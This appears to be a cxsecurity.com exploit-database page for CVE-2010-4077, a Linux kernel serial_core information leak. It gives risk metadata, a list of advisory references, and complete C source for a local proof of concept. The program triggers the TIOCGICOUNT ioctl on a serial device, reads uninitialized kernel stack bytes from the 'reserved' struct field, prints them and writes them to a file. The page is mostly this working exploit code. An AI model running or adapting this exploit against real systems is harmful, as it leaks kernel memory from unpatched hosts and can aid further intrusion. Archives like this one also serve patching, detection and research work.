Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT Leak Exploit

2011.03.15
Credit: prdelka
Risk: Low
Local: Yes
Remote: No
CWE: CWE-200


CVSS Base Score: 1.9/10
Impact Subscore: 2.9/10
Exploitability Subscore: 3.4/10
Exploit range: Local
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

/* Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT leak * ================================================ * Information leak exploit for CVE-2010-4077 which * leaks kernel stack space back to userland due to * uninitialized struct member "reserved" in struct * serial_icounter_struct copied to userland. uses * ioctl to trigger memory leak, dumps to file and * displays to command line. * * -- prdelka * */ #include <termios.h> #include <fcntl.h> #include <sys/ioctl.h> #include <linux/serial.h> #include <stdio.h> #include <stdlib.h> #include <string.h> int main(int argc, char* argv[]) { int fd, ret = 0, i; struct serial_icounter_struct buffer; printf("[ Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT leak exploit\n"); if(argc < 2){ printf("[ You need to supply a device name e.g. /dev/ttyS0\n"); exit(-1); }; memset(&buffer,0,sizeof(buffer)); if((fd = open(argv[1], O_RDONLY)) == -1){ printf("[ Couldn't open %s\n",argv[1]); exit(-1); } if((ioctl(fd, TIOCGICOUNT, &buffer)) == -1){ printf("[ Problem with ioctl() request\n"); exit(-1); } close(fd); for(i=0;i<=9;i++){ printf("[ int leak[%d]: %x\n",i,buffer.reserved[i]); }; if((fd = open("./leak", O_RDWR | O_CREAT, 0640)) == -1){ printf("[ Can't open file to write memory out\n"); exit(-1); } for(i=0;i<=9;i++){ ret += write(fd,&buffer.reserved[i],sizeof(int)); } close(fd); printf("[ Written %d leaked bytes to ./leak\n",ret); exit(0); }

References:

https://bugzilla.redhat.com/show_bug.cgi?id=648663
http://www.openwall.com/lists/oss-security/2010/10/25/3
http://www.openwall.com/lists/oss-security/2010/10/07/1
http://www.openwall.com/lists/oss-security/2010/09/25/2
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=d281da7ff6f70efca0553c288bb883e8605b3862
http://www.securityfocus.com/bid/45059
http://www.redhat.com/support/errata/RHSA-2011-0007.html
http://www.redhat.com/support/errata/RHSA-2010-0958.html
http://www.openwall.com/lists/oss-security/2010/10/06/6
http://secunia.com/advisories/42890
http://lkml.indiana.edu/hypermail//linux/kernel/1009.1/03387.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top